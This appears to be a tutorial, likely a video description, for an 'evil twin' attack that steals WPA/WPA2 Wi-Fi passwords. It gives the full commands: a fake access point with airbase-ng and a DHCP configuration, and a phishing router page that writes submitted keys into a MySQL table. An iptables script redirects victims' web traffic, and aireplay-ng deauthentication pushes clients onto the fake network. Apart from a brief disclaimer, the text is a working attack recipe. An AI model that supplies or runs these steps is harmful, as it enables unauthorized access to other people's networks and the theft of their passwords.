WPA/WPA2 exploitation with Aircrack (No Brutforce) Evil twin Method

"backtrack 5 r3"

Disclaimer: This video is for educational purposes only, and not intended to encourage the viewer to do cybercrime..as hacking any WiFi which you do not own, or without explicit permission from the owner is absolutely illegal. So as of this video I show you how to set-up a fake access point's to obtain a WPA handshake and serve the fake website, so whenever the client will input the correct password the Man In the Middle will also gather the data.

CODES USE IN THE VIDEO:

apt-get install dhcp3-server -y
airmon-ng
airmon-ng start wlan0
airodump-ng mon0

ctrl+c and select target


Open new terminal type this 

gedit /etc/dhcp3/dhcpd.conf

"when open" input all of this

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.1.255;
option routers 192.168.1.1;
option domain-name-servers 8.8.8.8;
range 192.168.1.2 192.168.1.254;
}

"Remember to save before add new terminal"

cd TP-Link/
ls
rm /var/www/index.html
cp error.html /var/www/
cp index.html /var/www/
cp savekey.php /var/www/
cp spanish-sky.jpg /var/www/
cp tp-link-logo.jpg /var/www/
cp update.html /var/www/
cp verizon.css /var/www/
ls /var/www/

"You can now close this terminal" and back to the first terminal"
"gedit /etc/dhcp3/dhcpd.conf"

Start  apache server by going -->application-->backtrack-->services-->HTTPD-->apache start-->start mysql application-->backtrack-->services-->mySQLD-->mysqlstart

"Don't close this", "Open a new terminal to create a new database in our MySQL server"

mysql -u root -p
create database NetworkKeys;
use NetworkKeys;
create table content(key1 VARCHAR(64), key2 VARCHAR(64));

After this, you may now close this terminal back to your previous terminal--> "gedit WPAHacking.sh"

"when open input this"

#!/bin/bash
ifconfig at0 up
ifconfig at0 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.254.107:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0
echo "1" > /proc/sys/net/ipv4/ip_forward

"DONT FORGET TO SAVE before closing" then back to "gedit terminal"
"now we need to stop our interface, and put it back up on the right channel

airmon-ng
airmon-ng stop mon0
airmon-ng start wlan0 1 // " channel of your target victims"
airodump-ng mon0

"Press ctrl+c to stop"

airbase-ng -e "[your target essid] -c [channel of target] -a [fake mac 00:11:22:33:44:55] mon0

//Don't forget to replace the words in the square brackets with the corresponding values...

"execute the bash-script we created before like this"

bash WPAHacking.sh

"After this" open new terminal to look for clients to de-authenticate on the network"

airodump-ng -c [channel of target] mon0

"Press ctrl+c to stop"

aireplay-ng -0 0 -a [bssid target]-c [station/client mac target] mon0

"Now after all done setting up you may sit back till someone fill into our trap relax and enjoy just wait for the client connect to our access point" when he fell into our trap we can get back to our MySQL database" and type codes below.

mysql -u root -p
use NetworkKeys;
select * from content;

Then we should have our WPA/wpa2keys